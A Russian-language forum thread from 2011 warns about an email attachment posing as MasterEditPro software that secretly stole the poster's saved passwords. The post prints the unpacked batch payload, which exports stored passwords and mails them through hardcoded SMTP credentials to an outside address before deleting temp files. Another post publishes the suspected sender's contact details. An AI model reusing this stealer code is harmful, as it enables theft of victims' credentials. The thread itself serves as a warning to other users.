Осторожно Вирус

[Maloi]

приходит на почту письмо.

от Александр Толмачёв <svd_tunner@mail.ru>

ответить Александр Толмачёв <svd_tunner@mail.ru>

кому ***@adact.ru

дата 27 февраля 2011 г. 22:02

тема MasterEditPro

отправлено через mail.ru

подписан mail.ru

 

прикреплен файл.

MasterEditPro.rar MasterEditPro.rar

1128Кб Загрузить

 

скачали, запустили, и все не оставляя следов он слил все пароли.

 

прога упакована.

Ultimate Packer for eXecutables

Copyright © 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007

UPX 3.00w Markus Oberhumer, Laszlo Molnar & John Reiser Apr 27th 2007

 

File size Ratio Format Name

-------------------- ------ ----------- -----------

3741184 <- 1155584 30.89% win32/pe upx806.tmp

 

Unpacked 1 file.

 

 

сам вредоносный код

@echo off

:start

ping ya.ru -n 5 >nul

if %errorlevel%==0 (goto send) else (goto end)

 

:end

goto :start

 

:send

blat.exe -install -server smtp.yandex.ru -port 587 -f do345@yandex.ru -u do345 -pw 1q2w3e4r5t

mpr.exe /export

ren *.mpf pass.mpf

blat.exe -body PassReg -to 32ej@mail.ru -attach pass.mpf

del %Temp%\*.* /Q /S /F

 

веду поиски урода, как найду, не обижайся.

[kstоvchanin]

Давай по порядку. Зачем скачивал и запускал? Это редактор Дика вроде, был куплен? Кто такой А. Толмачёв?

[Alex-13]

Ну сколько уже говорено-переговорено?

Акуратней в почте с не знакомыми.

Я просто удаляю такие нечитая.

Если знакомый Ник, подстраховываюсь через личку.

[Maloi Автор]

а куй его знает зачем запускал, как-то автоматом.

пароли меняю, это 10 минут дело.

я не для этого запостил.

чтоб не поворовали ваши пароли.

[Maloi Автор]

32ej@mail.ru

аська 636326078

ник ALEX ALEX

[romych]

Господа, почти!!! все умеют пользоваться HEX редактором. Открываем в "оном" и смотрим первую строку.

Пардон, просмотрел, что упакован...

 

Ну теперь тока исходщящие фильтры помогут нам. NAT не поможет нам!!!

Изменено 12 марта 2011 пользователем Lis2007